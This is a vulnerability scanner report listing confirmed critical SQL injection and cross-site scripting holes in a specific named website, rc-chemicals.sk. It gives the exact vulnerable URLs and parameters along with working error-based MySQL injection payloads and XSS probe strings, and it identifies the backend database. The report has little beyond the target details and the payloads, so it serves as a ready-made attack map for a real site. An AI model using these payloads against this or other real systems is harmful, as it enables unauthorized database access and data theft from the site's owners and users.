* SQL Injection
Severity: Critical
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="
Severity: Critical
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/en,szukaj
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="
* [High Possibility] SQL Injection
Severity: Critical
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+"
Severity: Critical
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/en,szukaj
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+"
* XSS (Cross-site Scripting)
Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/index.php?lang='"-->&page=2
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: lang
Parameter Type: Querystring
Attack Pattern: '"-->
Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/index.php?lang='"-->&page=3
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: lang
Parameter Type: Querystring
Attack Pattern: '"-->
Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: '"-->
Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/en,szukaj
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: '"-->
* MySQL Database Identified
Severity: Information
Confirmation: Confirmed
Vulnerable URL: http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications: -
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="